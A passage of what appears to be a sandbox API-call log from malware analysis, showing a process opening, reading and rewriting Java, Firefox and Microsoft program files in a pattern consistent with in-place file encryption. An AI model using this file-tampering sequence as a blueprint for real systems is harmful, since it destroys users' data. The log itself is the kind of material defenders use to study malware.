dwMilliseconds=0xffffffff) returned 0x0 [0154.834] ReleaseMutex (hMutex=0x168) returned 1 [0154.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rarotonga", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0154.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rarotonga", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rarotonga", lpUsedDefaultChar=0x0) returned 9 [0154.835] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ec7928, nNumberOfBytesToRead=0x11d, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec7928*, lpNumberOfBytesRead=0x359f2bc*=0x11d, lpOverlapped=0x0) returned 1 [0154.836] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0154.836] WriteFile (in: hFile=0x1e4, lpBuffer=0x2895ac8*, nNumberOfBytesToWrite=0x6a5, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2895ac8*, lpNumberOfBytesWritten=0x359f2d0*=0x6a5, lpOverlapped=0x0) returned 1 [0154.837] CloseHandle (hObject=0x1e4) returned 1 [0154.837] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0154.838] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.838] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1b [0154.838] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.838] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.838] ReleaseMutex (hMutex=0x168) returned 1 [0154.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AST4", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0154.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AST4", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AST4", lpUsedDefaultChar=0x0) returned 4 [0154.838] ReadFile (in: hFile=0x1e4, lpBuffer=0x1f88c40, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88c40*, lpNumberOfBytesRead=0x359f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0154.840] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0154.840] WriteFile (in: hFile=0x1e4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0154.840] CloseHandle (hObject=0x1e4) returned 1 [0154.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7mdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0154.841] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.841] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x8f0 [0154.841] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.841] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.841] ReleaseMutex (hMutex=0x168) returned 1 [0154.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MST7MDT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0154.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MST7MDT", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MST7MDT", lpUsedDefaultChar=0x0) returned 7 [0154.842] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a8518, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a8518*, lpNumberOfBytesRead=0x359f2bc*=0x8f0, lpOverlapped=0x0) returned 1 [0154.890] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0154.890] WriteFile (in: hFile=0x1e4, lpBuffer=0x25adcd8*, nNumberOfBytesToWrite=0xe78, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25adcd8*, lpNumberOfBytesWritten=0x359f2d0*=0xe78, lpOverlapped=0x0) returned 1 [0154.890] CloseHandle (hObject=0x1e4) returned 1 [0154.891] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\README.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\readme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0154.892] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.892] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2f [0154.892] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.892] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.892] ReleaseMutex (hMutex=0x168) returned 1 [0154.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="README.txt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0154.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="README.txt", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="README.txt", lpUsedDefaultChar=0x0) returned 10 [0154.893] ReadFile (in: hFile=0x1e4, lpBuffer=0x1fb3d98, nNumberOfBytesToRead=0x2f, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fb3d98*, lpNumberOfBytesRead=0x359f2bc*=0x2f, lpOverlapped=0x0) returned 1 [0154.896] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0154.896] WriteFile (in: hFile=0x1e4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b7, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5b7, lpOverlapped=0x0) returned 1 [0154.896] CloseHandle (hObject=0x1e4) returned 1 [0154.897] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0154.898] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.898] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x712e [0154.898] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0154.898] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.898] ReleaseMutex (hMutex=0x168) returned 1 [0154.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjet.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0154.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msjet.xsl", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msjet.xsl", lpUsedDefaultChar=0x0) returned 9 [0154.898] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.020] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x612e [0155.020] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.093] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x612e [0155.094] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.094] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0155.094] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0155.094] CloseHandle (hObject=0x1e4) returned 1 [0155.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\winscp.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\winscp.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0155.095] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\winscp.exe", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\winscp.exe", lpFilePart=0x359f690*="winscp.exe") returned 0x3b [0155.095] GetLastError () returned 0x20 [0155.095] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x51 [0155.095] LocalFree (hMem=0x69e018) returned 0x0 [0155.095] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0155.095] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0155.095] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0155.096] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0155.096] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\winscp.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\winscp.exe")) returned 0x20 [0155.096] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0155.103] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0155.103] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x54e [0155.103] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0155.103] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.103] ReleaseMutex (hMutex=0x168) returned 1 [0155.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="install.rdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0155.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="install.rdf", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="install.rdf", lpUsedDefaultChar=0x0) returned 11 [0155.103] ReadFile (in: hFile=0x1e4, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x54e, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x359f2bc*=0x54e, lpOverlapped=0x0) returned 1 [0155.105] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0155.105] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xad6, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x359f2d0*=0xad6, lpOverlapped=0x0) returned 1 [0155.105] CloseHandle (hObject=0x1e4) returned 1 [0155.106] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\firefox.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0155.106] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0155.107] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x43470 [0155.107] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0155.107] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.107] ReleaseMutex (hMutex=0x168) returned 1 [0155.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="firefox.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0155.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="firefox.exe", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="firefox.exe", lpUsedDefaultChar=0x0) returned 11 [0155.108] ReadFile (in: hFile=0x1e4, lpBuffer=0x28de2a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0155.159] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x42470 [0155.159] ReadFile (in: hFile=0x1e4, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.212] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x42470 [0155.212] WriteFile (in: hFile=0x1e4, lpBuffer=0x288a148*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288a148*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.213] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0155.213] WriteFile (in: hFile=0x1e4, lpBuffer=0x28e62d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28e62d8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0155.213] CloseHandle (hObject=0x1e4) returned 1 [0155.213] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\plugin-container.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-container.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0155.215] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0155.215] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4870 [0155.215] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0155.215] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.215] ReleaseMutex (hMutex=0x168) returned 1 [0155.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="plugin-container.exe", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0155.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="plugin-container.exe", cchWideChar=20, lpMultiByteStr=0x1f88bcc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="plugin-container.exe", lpUsedDefaultChar=0x0) returned 20 [0155.216] ReadFile (in: hFile=0x1e4, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.233] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3870 [0155.233] ReadFile (in: hFile=0x1e4, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.252] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x3870 [0155.252] WriteFile (in: hFile=0x1e4, lpBuffer=0x288b148*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288b148*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.252] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0155.253] WriteFile (in: hFile=0x1e4, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0155.253] CloseHandle (hObject=0x1e4) returned 1 [0155.253] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0155.255] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0155.255] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x42e70 [0155.255] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0155.256] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.256] ReleaseMutex (hMutex=0x168) returned 1 [0155.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0155.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.exe", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.exe", lpUsedDefaultChar=0x0) returned 11 [0155.256] ReadFile (in: hFile=0x1e4, lpBuffer=0x28790b8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x28790b8*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0155.278] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x41e70 [0155.278] ReadFile (in: hFile=0x1e4, lpBuffer=0x2870f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.290] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x41e70 [0155.291] WriteFile (in: hFile=0x1e4, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.292] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0155.292] WriteFile (in: hFile=0x1e4, lpBuffer=0x28810e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28810e8*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0155.292] CloseHandle (hObject=0x1e4) returned 1 [0155.293] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 